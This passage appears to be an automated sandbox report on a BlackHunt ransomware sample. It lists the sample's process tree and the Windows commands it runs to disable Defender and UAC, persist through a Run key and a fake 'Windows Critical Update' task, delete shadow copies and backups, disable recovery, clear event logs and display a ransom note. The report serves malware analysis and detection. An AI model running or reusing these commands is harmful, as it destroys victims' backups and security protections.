68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 111 PID 3720 wrote to memory of 4836 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 111 PID 3720 wrote to memory of 1008 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 190 PID 3720 wrote to memory of 1008 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 190 PID 3872 wrote to memory of 4764 3872 cmd.exe 113 PID 3872 wrote to memory of 4764 3872 cmd.exe 113 PID 4544 wrote to memory of 4612 4544 cmd.exe 189 PID 4544 wrote to memory of 4612 4544 cmd.exe 189 PID 3720 wrote to memory of 3444 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 114 PID 3720 wrote to memory of 3444 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 114 PID 3024 wrote to memory of 1264 3024 cmd.exe 187 PID 3024 wrote to memory of 1264 3024 cmd.exe 187 PID 4536 wrote to memory of 4580 4536 cmd.exe 186 PID 4536 wrote to memory of 4580 4536 cmd.exe 186 PID 3720 wrote to memory of 4248 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 185 PID 3720 wrote to memory of 4248 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 185 PID 4836 wrote to memory of 4008 4836 cmd.exe 115 PID 4836 wrote to memory of 4008 4836 cmd.exe 115 PID 1008 wrote to memory of 4960 1008 cmd.exe 116 PID 1008 wrote to memory of 4960 1008 cmd.exe 116 PID 3720 wrote to memory of 3476 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 118 PID 3720 wrote to memory of 3476 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 118 PID 3720 wrote to memory of 1128 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 127 PID 3720 wrote to memory of 1128 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 127 PID 3444 wrote to memory of 3076 3444 cmd.exe 126 PID 3444 wrote to memory of 3076 3444 cmd.exe 126 PID 4248 wrote to memory of 3272 4248 cmd.exe 119 PID 4248 wrote to memory of 3272 4248 cmd.exe 119 PID 3720 wrote to memory of 4288 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 121 PID 3720 wrote to memory of 4288 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 121 PID 3720 wrote to memory of 1912 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 197 PID 3720 wrote to memory of 1912 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 197 PID 3476 wrote to memory of 3312 3476 cmd.exe 125 PID 3476 wrote to memory of 3312 3476 cmd.exe 125 PID 3720 wrote to memory of 4840 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 183 PID 3720 wrote to memory of 4840 3720 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe 183 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe"C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3720 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:4996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:3800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1252
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵PID:4616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:4784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4544 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:3024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3476 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4288
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:3436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1128
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3224
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f4⤵
- Modifies registry class
PID:3884
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4392
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:4492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:3772
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:4680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:5040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵
- Modifies registry class
PID:4616 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:8400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:5080
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:8392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe" /F2⤵PID:3488
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe" /F3⤵
- Creates scheduled task(s)
PID:8744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2316
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:392
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1264
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:8820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:4832
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4600
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:10052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2984
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4552
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:604
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:11376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:4256
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3716
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4248
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1008
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:5544
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:5908
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:8120
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:10260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:6528
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:7004
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:15760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:10188
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:8516
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:6868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:15684
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:18176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:7232
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:15780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:11464
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:8116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3952
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:14612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:14572
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:14656
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:14156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:14692
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:15416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:15448
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:7324
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:15372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:8188
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:11068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:4904
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:10984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:13276
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:15388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:10792
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:15428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:14212 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:15540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15540 -s 14604⤵
- Program crash
PID:9844
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\68d3b9491e26feee031a56b82d95cc4e3c9ea065f6add872b26dc3bafc55994b.exe"2⤵PID:8504
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:11052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:10460
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8468
-
-
-
